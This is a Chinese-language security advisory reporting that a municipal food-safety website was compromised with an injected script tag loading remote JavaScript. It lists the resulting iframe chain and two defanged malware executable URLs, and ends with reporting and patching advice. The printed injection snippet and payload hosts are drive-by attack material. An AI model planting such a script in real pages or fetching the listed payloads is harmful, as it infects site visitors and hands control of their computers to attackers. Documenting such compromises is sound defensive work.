威海市食品安全网被植入恶意代码
威海市食品安全网(hxxp://www.whfda.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:hxxp://www.whfda.com/
网页被嵌入恶意链接代码:
<script src=hxxp://3b3.org/c.js></script>
挂马分析:
[wide]hxxp://www.whfda.com/
[script]hxxp://3b3.org/c.js
[frame]hxxp://vpsvip.com/aa/a100.htm
[frame]hxxp://vpsvip.com/aa/index.htm
[frame]hxxp://vpsvip.com/aa/axin.htm
[script]hxxp://vpsvip.com/aa/js.js
[frame]hxxp://vpsvip.com/aa/vc14.htm
[frame]hxxp://vpsvip.com/aa/vcfl.htm
[frame]hxxp://vpsvip.com/aa/vcff.htm
[frame]hxxp://vpsvip.com/aa/z.htm
[frame]hxxp://vpsvip.com/aa/vcvod.htm
[frame]hxxp://vpsvip.com/aa/vcxxz.htm
[frame]hxxp://vpsvip.com/aa/vclb.htm
[frame]hxxp://vpsvip.com/aa/vcr.htm
[script]hxxp://js.tongji.cn.yahoo.com/1083501/ystat.js
[script]hxxp://s31.cnzz.com/stat.php?id=1408284&web_id=1408284
[script]hxxp://js.tongji.linezing.com/1136402/tongji.js
最终下载病毒文件:
hxxp://altyyy.3322.org/atievx.exe
hxxp://milllk.com/wm/svchost.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
该网站历史挂马次数:31
Google对该网站的判定:恶意
提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:hxxp://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。
关键字:恶意代码威海市食品安全网
